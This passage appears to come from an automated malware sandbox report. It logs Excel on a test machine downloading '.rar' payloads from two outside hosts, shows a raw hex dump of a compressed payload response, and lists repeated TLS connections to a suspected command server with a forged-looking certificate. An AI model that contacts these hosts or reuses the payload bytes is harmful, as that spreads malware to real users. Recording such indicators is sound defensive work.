                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: oudtshoornpharmacies.co.za
                Connection: Keep-Alive
                Jan 13, 2021 16:39:01.620605946 CET324INHTTP/1.1 200 OK
                Date: Wed, 13 Jan 2021 15:39:01 GMT
                Server: Apache
                Last-Modified: Wed, 16 Dec 2020 13:39:12 GMT
                Accept-Ranges: bytes
                Vary: Accept-Encoding,User-Agent
                Content-Encoding: gzip
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Transfer-Encoding: chunked
                Content-Type: application/x-rar-compressed
                Data Raw: 31 66 61 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec fd 09 58 53 c7 fb 3f 0c cf 39 80 82 a2 41 05 83 82 4b c9 d1 a8 6c 21 c1 ad 68 45 41 d1 82 1a d9 82 82 0a 42 48 08 08 14 42 5d 40 c1 12 aa 78 48 b5 8a c6 85 ba a1 62 dd 00 45 45 50 a1 6e 68 41 41 5c 62 85 56 ea 96 a3 b8 50 b5 75 e7 3c f7 24 d0 26 fd fe fe cf ff 7d af eb ff 5c ef f5 3e d7 97 f6 36 f7 99 99 f3 99 ed 9e 7b 3e 73 32 67 32 7d ce 5a 64 86 10 32 07 61 59 84 ca 91 e1 cf 1b fd ef ff b2 40 7a 0e aa e8 89 ca ac ae 7c 56 4e 04 5c f9 2c 58 1e 97 3a 38 39 25 49 96 12 b5 70 70 74 54 62 62 92 72 f0 02 e9 e0 94 b4 c4 c1 71 89 83 7d 67 06 0d 5e 98 14 23 75 eb d1 a3 1b d5 81 21 9e 8c 50 00 61 85 82 9a da e7 77 e2 b6 a0 9e 9f 75 27 48 21 4a 81 52 b9 74 84 39 c2 3f 36 20 02 fd a5 8d 5e 27 0d e5 46 e8 9f 4f 64 63 f1 f7 05 d9 91 54 9f f6 ef cf bf 3f f4 7f 79 d1 08 5d c2 4a 9b 39 62 fe c7 5a 5a a0 66 8b ff 0f 1a e3 5f 7f e6 72 84 4a cc fe d7 f1 6e 4a e9 62 25 7c 1e ee d7 51 a0 fe c8 a8 12 86 bf c1 08 45 ba a5 c4 44 29 a3 10 fa 1d 07 08 90 a1 52 03 4d d3 79 c3 ff 6e 42 83 de ad 23 40 9f 6e f0 ff 90 4e 8f 27 34 a4 13 77 a4 73 fa 1f d2 19 b2 45 b7 71 bb 47 76 e4 49 fd 47 ba 6a 7d 3d 46 02 14 c6 c9 ea a8 c3 a4 ff a8 87 b7 3e 9d 27 42 75 81 90 60 2d 04 06 c3 e7 94 ff 21 5d 4a 6a 0a 74 89 a1 2f a0 4f f4 e5 db 62 da 30 86 7a 48 13 92 20 a1 a1 6f e0 9f 2e f0 51 f0 1f e9 fe 55 92 ff fe fd fb 2f 84 7e 5a 63 b1 2f 03 d9 8c 5d 87 6c 76 62 c5 75 24 34 79 21 d6 f4 97 73 cf d5 19 ff 41 fa 59 a1 f4 64 eb dc c9 1f e9 1e 07 21 3e 77 ba a5 3c a2 17 42 0a c4 da 29 23 91 0d 1d f2 51 5d 46 c6 ee ec 82 4c 82 cd da e8 c9 96 66 02 7a ba 65 ae 07 1d 62 49 93 ae 38 09 be 24 e6 d1 0f ff c9 04 f0 4d 72 d4 97 2f 38 c3 30 66 77 aa 40 31 d3 5f 16 e2 bc e9 1e 58 9d 25 7f 39 00 0c 66 01 cb b2 d9 e7 2d 69 3b 7d a9 ec 4a 70 05 70 b4 c5 72 01 d4 a7 0c 34 66 02 58 bd e1 9e ec 9f cc 73 f5 4a 8d 45 32 94 ee 8f 0a 84 fe ab fd 57 fb af f6 5f ed bf da 7f b5 ff 6a ff d5 fe ab fd 9f d0 68 3b cc b2 bc ec bc e1 df 14 b2 b5 47 b9 f3 7e 84 72 aa 39 39 82 bf 58 16 98 1e e6 93 3b b3 30 97 9b fa 31 77 fa 47 60 8f b9 fa b4 34 f0 cb 87 86 f8 ec a7 f6 a1 92 9a c9 6f 31 03 ac 99 dc 66 44 04 63 30 d3 c3 44 14 03 98 f5 90 eb e9 28 43 87 30 b9 21 af cb e7 8b 70 46 ca f1 f4 f4 b7 5e 3d 76 18 b2 17 d0 69 6f cd d2 da e8 65 6f cd 96 b5 99 f2 53 80 09 79 bd da 5a b8 ca 7a 0c 1d f2 36 fb 2c 91 1b f2 b6 b5 62 27 be b1 70 2a fc 33 7f 5e 67 79 76 62 6a 59 58 8e 09 e5 6f d6 08 99 12 64 3d 5f 5d db c1 57 99 ab 5d 71 5b 04 c0 25 81 2f d7 bc 66 d9 42 5c 56 79 23 81 97 38 7a c6 6a 5e 88 eb bb 13 ff 53 78 0a c7 2d 86 e2 c8 57 c1 3f ac 1d ac 22 6d c4 ac 9d 25 7c 14 56 43 5c b9 37 c0 88 4f e2 85 e0 2c 76 24 4e cd 8e cc d3 ff 8b 63 67 d3 3d f0 07 5d fd bf fb 4f fe d1 01 68 f3 b9 c2 f3 7a 0e 8d ff cd ed 81 5b 94 d6 37 7d ae 9d af 9e 18 8b e1 df 33 07 a1 b1 c5 fa 64 38 81 3a 9f 28 a9 32 43 b9 76 38 48 1f ee 8a 53 14 8a f5 37 c4 74 54 9b ee a1 ef 18 7d 7f d4 58 44 c2 bf d0 4c 1d ed a4 ef ef b0 8e 7e 93 7e 0c a3 99 9d 4a b8 12 ef c4 8d 24 a6 1b ff bf fa 4f 5f 8c c0 73 ff 9b f5 43 f6 53 4b 58 71 e4 da e1 7c 72 5d 71 de
                Data Ascii: 1faaXS?9AKl!hEABHB]@xHbEEPnhAA\bVPu<$&}\>6{>s2g2}Zd2aY@z|VN\,X:89%IpptTbbrq}g^#u!Pawu'H!JRt9?6 ^'FOdcT?y]J9bZZf_rJnJb%|QED)RMynB#@nN'4wsEqGvIGj}=F>'Bu`-!]Jjt/Ob0zH o.QU/~Zc/]lvbu$4y!sAYd!>w<B)#Q]FLfzebI8$Mr/80fw@1_X%9f-i;}Jppr4fXsJE2W_jh;G~r99X;01wG`4o1fDc0D(C0!pF^=vioeoSyZz6,b'p*3^gyvbjYXod=_]W]q[%/fB\Vy#8zj^Sx-W?"m%|VC\7O,v$Ncg=]Ohz[7}3d8:(2Cv8HS7tT}XDL~~J$O_sCSKXq|r]q


                Session IDSource IPSource PortDestination IPDestination PortProcess
                2192.168.2.2249169104.24.124.12780C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                TimestampkBytes transferredDirectionData
                Jan 13, 2021 16:39:07.434938908 CET584OUTGET /usc3d1.rar HTTP/1.1
                Accept: */*
                UA-CPU: AMD64
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: sendgrid.invoteqleads.com
                Connection: Keep-Alive
                Jan 13, 2021 16:39:07.640290976 CET647INHTTP/1.1 200 OK
                Date: Wed, 13 Jan 2021 15:39:07 GMT
                Content-Type: application/x-rar-compressed
                Content-Length: 0
                Connection: keep-alive
                Set-Cookie: __cfduid=d24425c38282fae9d3f801a2e53842d3c1610552347; expires=Fri, 12-Feb-21 15:39:07 GMT; path=/; domain=.invoteqleads.com; HttpOnly; SameSite=Lax
                Last-Modified: Wed, 13 Jan 2021 14:10:37 GMT
                ETag: "12e0df-0-5b8c8b40b6d3f"
                X-Varnish: 2961376 3517331
                Age: 355
                X-Cache: HIT
                X-Cache-Hits: 7
                Accept-Ranges: bytes
                CF-Cache-Status: DYNAMIC
                cf-request-id: 079dffa34f000041133a068000000001
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=n1rJ9YTU0d9eSY9JLS%2BXwjb2%2F5qhOW1FvUI3PooamsyDlI20E3agtpgRo7HjEJ5tOjAlw3H55wt2oQprArKGfnEgW8GGlmZR50mT8EZEaJBUfVXhKbmrdJS4"}],"group":"cf-nel","max_age":604800}
                NEL: {"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 6110354bbddc4113-PRG


                HTTPS Packets

                TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                Jan 13, 2021 16:39:05.193562984 CET221.126.244.72443192.168.2.2249167CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:09.162190914 CET221.126.244.72443192.168.2.2249170CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:13.268611908 CET221.126.244.72443192.168.2.2249175CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:14.891390085 CET221.126.244.72443192.168.2.2249176CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:18.261352062 CET221.126.244.72443192.168.2.2249181CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:19.909943104 CET221.126.244.72443192.168.2.2249182CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:23.452966928 CET221.126.244.72443192.168.2.2249187CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:26.484675884 CET221.126.244.72443192.168.2.2249188CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:30.368347883 CET221.126.244.72443192.168.2.2249193CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:31.476021051 CET221.126.244.72443192.168.2.2249194CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:35.353327036 CET221.126.244.72443192.168.2.2249199CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:36.496928930 CET221.126.244.72443192.168.2.2249200CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:40.366308928 CET221.126.244.72443192.168.2.2249205CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:41.540806055 CET221.126.244.72443192.168.2.2249206CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:47.274188995 CET221.126.244.72443192.168.2.2249211CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:49.940793991 CET221.126.244.72443192.168.2.2249212CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:52.826827049 CET221.126.244.72443192.168.2.2249217CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:54.904294968 CET221.126.244.72443192.168.2.2249218CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:57.763037920 CET221.126.244.72443192.168.2.2249223CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:39:59.878298998 CET221.126.244.72443192.168.2.2249225CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:02.732959986 CET221.126.244.72443192.168.2.2249229CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:05.009872913 CET221.126.244.72443192.168.2.2249230CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:08.074237108 CET221.126.244.72443192.168.2.2249235CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:09.964689016 CET221.126.244.72443192.168.2.2249236CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:13.046384096 CET221.126.244.72443192.168.2.2249241CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:14.987751961 CET221.126.244.72443192.168.2.2249242CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:18.032439947 CET221.126.244.72443192.168.2.2249247CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:19.984910011 CET221.126.244.72443192.168.2.2249248CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:23.045615911 CET221.126.244.72443192.168.2.2249253CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:24.944977045 CET221.126.244.72443192.168.2.2249254CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:28.012180090 CET221.126.244.72443192.168.2.2249259CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:29.930995941 CET221.126.244.72443192.168.2.2249260CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:33.000884056 CET221.126.244.72443192.168.2.2249265CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:34.938282013 CET221.126.244.72443192.168.2.2249266CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:38.001213074 CET221.126.244.72443192.168.2.2249271CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
                Jan 13, 2021 16:40:39.933769941 CET221.126.244.72443192.168.2.2249272CN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERCN=Tthechhwafi.ideafvasmbyit.baidu, O=Fshan SAE, L=Asmara, ST=ianwl, C=ERSun Jan 10 12:10:00 CET 2021Sun Jul 11 13:10:00 CEST 2021771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,10-11-13-23-65281,23-24,0eb88d0b3e1961a0562f006e5ce2a0b87
